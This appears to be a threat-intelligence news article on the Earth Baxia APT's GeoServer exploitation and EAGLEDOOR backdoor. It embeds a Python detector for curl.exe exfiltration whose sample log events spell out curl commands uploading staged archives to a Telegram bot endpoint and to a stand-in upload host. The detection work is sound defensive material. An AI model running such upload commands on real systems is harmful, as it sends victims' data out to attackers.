A Chinese-linked advanced persistent threat (APT), identified as Earth Baxia, has been targeting government organizations in Taiwan and other Asia-Pacific (APAC) nations by exploiting a critical vulnerability in OSGeo GeoServer GeoTools, recently patched in 2024. According to Trend Micro, the cyberattacks, first detected in July 2024, resemble tactics previously attributed to APT41, particularly through the use of Cobalt Strike command-and-control (C2) domains imitating major cloud services like Amazon Web Services and Microsoft Azure.
The ultimate objective of the attack is to deploy a customized Cobalt Strike variant, which serves as a platform to load the EAGLEDOOR backdoor. The EAGLEDOOR malware utilizes multiple communication protocols, including DNS, HTTP, TCP, and Telegram, with the Telegram Bot API being used to manage files and execute additional payloads. Stolen data is exfiltrated using curl.exe.
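The exfiltration path described above (curl.exe pushing files to the Telegram Bot API) is something a defender can hunt for in process-creation telemetry. The script below is an added example written for this page, not code from the report or from Trend Micro: it scores curl.exe command lines for two signals, a URL matching the real Telegram Bot API shape (`https://api.telegram.org/bot<token>/...`) and curl upload switches (`-F`, `-T`, `--upload-file`, `-d @file` and friends). The log events are constructed, Sysmon-style samples with a placeholder bot token, not indicators from the campaign.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (hypothetical; not from the report).
# Fields mirror the Image / CommandLine / ParentImage columns of Sysmon Event ID 1.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # upload of a staged archive to a Telegram bot: both signals fire
        "image": r"C:\Windows\System32\curl.exe",
        "cmdline": r'curl.exe -s -F "document=@C:\Users\Public\staging\report.rar" '
                   r'https://api.telegram.org/botPLACEHOLDER_TOKEN/sendDocument',
        "parent": r"C:\Windows\System32\rundll32.exe",
    },
    {   # generic file upload to an unknown host: upload signal only
        "image": r"C:\Windows\System32\curl.exe",
        "cmdline": r"curl.exe -T C:\ProgramData\out.7z https://files.example.net/upload",
        "parent": r"C:\Windows\System32\cmd.exe",
    },
    {   # benign download (installer fetch): no signal
        "image": r"C:\Windows\System32\curl.exe",
        "cmdline": r"curl.exe -sSL https://aka.ms/installazurecliwindows -o az.msi",
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # benign health check from a developer shell: no signal
        "image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
        "cmdline": r"curl.exe https://example.com/health",
        "parent": r"C:\Program Files\Git\bin\bash.exe",
    },
]

# Telegram Bot API calls always carry the token in the path: /bot<token>/<method>
TELEGRAM_BOT = re.compile(r"https?://api\.telegram\.org/bot[^/\s]*/", re.IGNORECASE)

# curl switches that send local file content to a remote host. Single-letter
# flags must be whole tokens so that e.g. "-sSL" is not mistaken for "-T".
UPLOAD_FLAGS = re.compile(
    r"(?:^|\s)(?:"
    r"(?:-F|--form|-T|--upload-file)(?=\s|$)"
    r"|(?:-d|--data|--data-binary|--data-raw)\s+@"
    r")"
)

# Hostnames of every URL on the command line, for triage and allow-listing.
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


def assess(event: Dict[str, str]) -> List[str]:
    """Return the list of detection reasons for one process-creation event.

    Only curl.exe is considered; other images return an empty list.
    """
    reasons: List[str] = []
    if not event["image"].lower().endswith("curl.exe"):
        return reasons
    cmd = event["cmdline"]
    if TELEGRAM_BOT.search(cmd):
        reasons.append("telegram_bot_api")
    if UPLOAD_FLAGS.search(cmd):
        reasons.append("file_upload")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run assess() over a batch of events and keep only those that fired."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        reasons = assess(ev)
        if reasons:
            findings.append({
                "cmdline": ev["cmdline"],
                "parent": ev["parent"],
                "reasons": reasons,
                "hosts": URL_HOST.findall(ev["cmdline"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{','.join(f['reasons'])}] parent={f['parent']} hosts={f['hosts']}")
        print(f"    {f['cmdline']}")
```

The two signals are deliberately separate: a Telegram Bot API URL from curl.exe is rarely legitimate on a government workstation and can be alerted on directly, whereas a bare upload switch is common in build and IT tooling and is better combined with the parent process and destination host (both carried in each finding) before it is escalated.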
Researchers pointed out that Earth Baxia has been conducting a sophisticated campaign primarily targeting government, telecommunications, and energy sectors in countries like the Philippines, South Korea, Vietnam, Taiwan, and Thailand. The attack methods include spear-phishing emails and exploiting the GeoServer vulnerability (CVE-2024-36401, CVSS score: 9.8).
This multi-stage attack chain incorporates techniques like AppDomainManager injection and GrimResource to bypass security measures and deploy further malicious payloads, such as the previously unknown EAGLEDOOR backdoor, allowing for data theft and continued malicious activity.
The discovery of phishing emails and decoy documents written in Simplified Chinese suggests that China may also be among the affected nations, though the exact sectors targeted remain unclear.